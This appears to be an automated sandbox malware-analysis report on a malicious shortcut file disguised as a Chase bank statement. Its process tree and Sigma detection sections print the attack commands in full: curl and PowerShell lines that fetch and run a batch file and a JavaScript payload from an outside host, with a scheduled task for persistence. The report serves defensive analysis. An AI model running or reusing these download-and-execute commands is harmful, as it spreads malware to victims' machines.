Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
chasebank_statement_mar.lnk

Overview

General Information

Sample name:chasebank_statement_mar.lnk
Analysis ID:1417179
MD5:2ac1bf6ce61112134a087ce30d48cd6b
SHA1:3b78b7507e4a1fe63ce51a5a2b19de8487b199f1
SHA256:b54eb35a701e5bba8f1df00f4e21e2bd4637ce3ce490560d203feab0dc84ff06
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Sigma detected: Curl Download And Execute Combination
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6220 cmdline: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 6024 cmdline: curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • schtasks.exe (PID: 2232 cmdline: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 1268 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5668 cmdline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6004 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 4480 cmdline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cmd.exe (PID: 1776 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2952 cmdline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1400 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 5176 cmdline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cmd.exe (PID: 5384 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7084 cmdline: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4852 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 2876 cmdline: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Curl Download And Execute Combination
Source: Process startedAuthor: Sreeman, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ProcessId: 6220, ProcessName: cmd.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f, CommandLine: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f, CommandLine|base64offset|contains: z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f, ProcessId: 6004, ProcessName: schtasks.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, ProcessId: 4480, ProcessName: wscript.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, ProcessId: 4480, ProcessName: wscript.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5668, TargetFilename: C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe
Sigma detected: Suspicious Schtasks From Env Var Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ProcessId: 2232, ProcessName: schtasks.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1, ProcessId: 6220, ProcessName: cmd.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js, ProcessId: 4480, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js", ProcessId: 5668, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.jsAvira: detection malicious, Label: JS/PShelldldr.MGBK
Machine Learning detection for sample
Source: chasebank_statement_mar.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: COGECO-PEER1CA COGECO-PEER1CA
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: admiralpub.caConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: admiralpub.caConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: admiralpub.caConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/olympiadic.php HTTP/1.1Host: admiralpub.caUser-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: admiralpub.caConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: admiralpub.caConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: admiralpub.caConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: admiralpub.ca
Source: powershell.exe, 00000007.00000002.2038635027.0000023F44644000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A015D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD015D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://admiralpub.ca
Source: powershell.exe, 0000000E.00000002.2260297974.0000027A686B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000015.00000002.2894258629.000002AD6D655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft8
Source: powershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admiralpub.ca
Source: powershell.exe, 00000007.00000002.2038635027.0000023F4467C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admiralpub.ca/wp-content/
